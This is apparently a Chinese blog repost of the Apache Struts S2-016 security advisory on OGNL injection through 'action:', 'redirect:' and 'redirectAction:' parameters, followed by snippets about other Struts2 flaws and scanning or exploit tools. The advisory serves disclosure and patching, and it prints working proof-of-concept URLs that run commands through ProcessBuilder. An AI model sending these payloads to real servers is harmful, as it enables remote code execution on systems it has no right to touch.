Struts 2的漏洞原理:
Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with "action:" or "redirect:", followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
In the Struts Blank App, open following URLs.
- Simple Expression - the parameter names are evaluated as OGNL.
-
http:
//host/struts2-blank/example/X.action?action:%25{3*4}
-
http:
//host/struts2-showcase/employee/save.action?redirect:%25{3*4}
-
- Command Execution
-
http:
//host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
-
http:
//host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
-
http:
//host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
-
It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library. |
from:http://www.cnblogs.com/security4399/ 漏洞信息库
from:http://struts.apache.org/release/2.3.x/docs/s2-016.html
相关推荐
今天,我们将讨论如何修复 Struts2 漏洞 S2-045 而不升级 jar 版本。 漏洞概述 S2-045 漏洞是一个严重的安全漏洞,影响 Struts2 的多个版本,包括 2.3.5-2.3.31 和 2.5-2.5.102。该漏洞是由于 Struts2 中的 ...
该全版本漏洞检测工具可能包含了针对Struts 2不同版本的漏洞检查模块,这些模块可能包括但不限于以下方面: 1. **OGNL漏洞扫描**:检测Struts 2应用中是否存在可被恶意利用的OGNL表达式,如未过滤的用户输入或不...
Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试Struts2漏洞测试...
Struts2是一款非常流行的Java Web框架,用于构建企业级应用。然而,随着时间的推移,Struts2在安全方面暴露出了一些重要的漏洞,这给使用...定期进行漏洞扫描和更新Struts2到最新版本,是防止这类安全问题的有效手段。
==漏洞编号==============影响版本=========================官方公告==========================================影响范围===== S2-057 CVE-2018-11776 Struts 2.3 to 2.3.34,Struts 2.5 to 2.5.16 ...
总之,Struts2作为一个强大但可能存在安全风险的框架,需要开发者和运维人员具备扎实的安全知识,以确保其在生产环境中的稳定与安全。使用如"Struts2漏洞检查工具2018版"这样的工具,是主动防御和及时发现安全隐患的...
Apache Struts2是一款非常流行的Java Web开发框架,它为开发者提供了构建MVC(Model-View-Controller)架构的便捷工具。然而,就像任何其他复杂的软件系统一样,Struts2也存在安全漏洞。其中,S2-045 和 CVE-2017-...
此漏洞影响了多个Struts2版本,因此成为了很多黑客的攻击目标。 "Struts2漏洞检查工具2019版 V2.3.exe" 可能是用来扫描网络中运行Struts2的应用程序,检查是否存在已知的漏洞,如S2-045。这类工具通常会模拟攻击...
从Apache Struts的官方网站下载Struts2的最新稳定版本,即2.5.12。这个版本包含了对已知漏洞的修复,并提供了许多新功能和性能优化。 **4. 更新pom.xml或build.gradle** 如果你的项目使用Maven或Gradle作为构建工具...
1、升级所需要的jar(见附件): freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar 2、删除...
Struts2是一个基于MVC设计模式的Web应用框架,但2存在远程代码执行的漏洞,现在Struts2漏洞检测工具2017版增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过...
描述中提到的"Struts2各版本漏洞扫描利用工具"表明该工具不仅能够扫描Struts2应用的漏洞,还可能包含了一些漏洞利用的模块。这可能是为了进行安全测试,模拟黑客可能采取的攻击手段,以便于防御。 在标签中,“漏洞...
为了保护系统免受Struts2漏洞的影响,开发者应密切关注Apache Struts的安全公告,并定期更新到最新版本。此外,了解并应用最佳安全实践,如禁用不必要的插件,限制OGNL表达式执行,以及使用参数化查询来防止SQL注入...
然而,随着时间的推移,Struts2框架在历史版本中暴露出了一些安全漏洞,其中最著名的就是与Java反序列化相关的安全问题。2017版的"Struts2漏洞检查工具"就是为了帮助开发者检测并修复这些漏洞而设计的。 Java反序列...
4. **修复建议**:除了利用工具,这个压缩包可能还包含针对这些漏洞的修复建议,例如更新到不受影响的Struts2版本、配置修改或添加过滤规则。 在进行漏洞利用时,需要遵循道德黑客的原则,只在获得授权的情况下对...
此漏洞影响了大量使用Struts2的网站,包括政府和企业机构,因此引起了广泛关注和紧急响应。 对于防御Struts2漏洞,首要任务是保持框架版本的及时更新。当新的安全补丁发布时,应尽快升级到最新版本,避免使用已知...
最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者执行恶意代码,从而危害到网站的安全。 S2-016 漏洞是由于 Struts2 的 Ognl 表达式语言解析器存在缺陷,从而导致攻击者...
总之,面对Apache Struts2框架的安全漏洞,最重要的是保持框架版本的更新,同时对输入进行严格的验证和过滤,以防止恶意OGNL表达式的执行。此外,建立全面的安全防御体系,包括日志监控、代码审计和团队培训,是保护...